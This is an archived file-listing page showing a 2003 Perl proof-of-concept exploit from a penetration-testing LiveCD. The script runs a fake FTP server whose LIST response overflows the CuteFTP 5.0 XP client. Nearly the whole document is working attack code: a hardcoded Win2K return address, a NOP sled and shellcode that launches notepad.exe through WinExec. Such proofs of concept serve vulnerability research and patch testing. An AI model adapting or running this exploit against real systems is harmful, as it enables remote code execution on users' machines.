home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / cuteftp / ftpd.pl < prev   
Encoding:
Perl Script  |  2005-02-12  |  2.8 KB  |  106 lines
  1. #!/usr/bin/perl
  2. #
  3. #  Date: 26/03/2003
  4. #  Author: snooq [http://www.angelfire.com/linux/snooq/]
  5. #
  6. #  Basically, this is a fake ftpd that will send out 'overly long' 
  7. #  LIST response to overflow the CuteFTP 5.0 XP client.
  8. #
  9. #  For more info on the bug, read these:
  10. #
  11. #  -> http://www.securityfocus.com/archive/1/307160/2003-02-05/2003-02-11/2
  12. #  -> http://www.securiteam.com/windowsntfocus/5PP0P0U8UU.html
  13. #
  14. #  Notes:
  15. #  ======
  16. #  1. Server's 227 response are hardcoded. (ie IP and data port)
  17. #  2. Payload is harmless 'notepad.exe'.
  18. #
  19. #  Flame or comment, goes to jinyean_at_hotmail_dot_com
  20.  
  21. use Socket;
  22. use FileHandle;
  23.  
  24. my $port=21;
  25. my $data_port=24876;            # 97, 44
  26. my $ret="\xa1\xeb\xe9\x77";        # 0x77e9eba1, CALL ESP, Win2K, kernel32.dll 5.0.2195.1600 
  27. my $shellcode="\x55"            # push ebp 
  28.          ."\x8b\xec"        # mov ebp, esp 
  29.          ."\xb8\x0e\xb5\xe9\x77"    # mov eax, 0x77e9b50e -> WinExec()  
  30.          ."\x33\xf6"        # xor esi, esi
  31.          ."\x56"            # push esi
  32.          ."\x68\x2e\x65\x78\x65"    # push 'exe.'
  33.          ."\x68\x65\x70\x61\x64"    # push 'dape'
  34.          ."\x68\x90\x6e\x6f\x74"    # push 'ton'
  35.          ."\x8d\x7d\xf1"        # lea edi, [ebp-0xf]    
  36.          ."\x57"            # push edi        
  37.          ."\xff\xd0"        # call eax
  38.         #."\xcc";            # int 3 -> breakpoint, for debugging
  39.          ."\x55"            # push ebp 
  40.          ."\x8b\xec"        # mov ebp, esp 
  41.          ."\x33\xf6"        # xor esi, esi
  42.          ."\x56"            # push esi
  43.          ."\xb8\x2d\xf3\xe8\x77"    # mov eax, 0x77e8f32d -> ExitProcess()  
  44.          ."\xff\xd0";        # call eax
  45.     
  46. for ($i=0;$i<256;$i++) {     
  47.     $pad1.="A";
  48. }
  49. for ($i=0;$i<133;$i++) {     
  50.     $pad2.=$ret;
  51. }
  52. for ($i=0;$i<(100-length($shellcode));$i++) {     
  53.     $pad3.="\x90";
  54. }
  55. for ($i=0;$i<900;$i++) {     
  56.     $pad4.="\x90";
  57. }
  58.  
  59. $buff=$pad1.$pad2.$pad3.$shellcode.$pad4;
  60.  
  61. socket(SOCKET1,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
  62. bind(SOCKET1,pack('Sna4x8',AF_INET,$port,"\0\0\0\0")) || die "Can't bind to port $port: $!\n";
  63. listen(SOCKET1,5);
  64.  
  65. socket(SOCKET2,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
  66. bind(SOCKET2,pack('Sna4x8',AF_INET,$data_port,"\0\0\0\0")) || die "Can't bind to port $data_port: $!\n";
  67. listen(SOCKET2,5);
  68.  
  69. NEW_SOCKET1->autoflush();
  70. SOCKET1->autoflush();
  71.  
  72. NEW_SOCKET2->autoflush();
  73. SOCKET2->autoflush();
  74.  
  75. while(1){
  76.     accept(NEW_SOCKET1,SOCKET1);
  77.     print NEW_SOCKET1 "220 Welcome to EvilFTPd 1.0\r\n";
  78.     while(<NEW_SOCKET1>) {
  79.         chomp;
  80.         if (/USER/i) {
  81.             print NEW_SOCKET1 "331 OK\r\n";
  82.         }
  83.         elsif (/PASS/i) {
  84.             print NEW_SOCKET1 "230 OK\r\n";
  85.         }
  86.         elsif (/PASV/i) {
  87.             print NEW_SOCKET1 "227 Entering Passive Mode (192,168,8,8,97,44)\r\n";
  88.         }
  89.         elsif (/LIST/i) {
  90.             if (!($pid=fork)) {    # fork a child to handle data connection
  91.                 while(1) {
  92.                     accept(NEW_SOCKET2,SOCKET2);
  93.                     print NEW_SOCKET2 "$buff";
  94.                 }
  95.             }
  96.             else {
  97.                 print NEW_SOCKET1 "150 OK\r\n";
  98.                 print NEW_SOCKET1 "226 OK\r\n";    
  99.             }
  100.         }
  101.         else {
  102.             print NEW_SOCKET1 "200 OK\r\n";
  103.         }
  104.     }
  105. }
  106.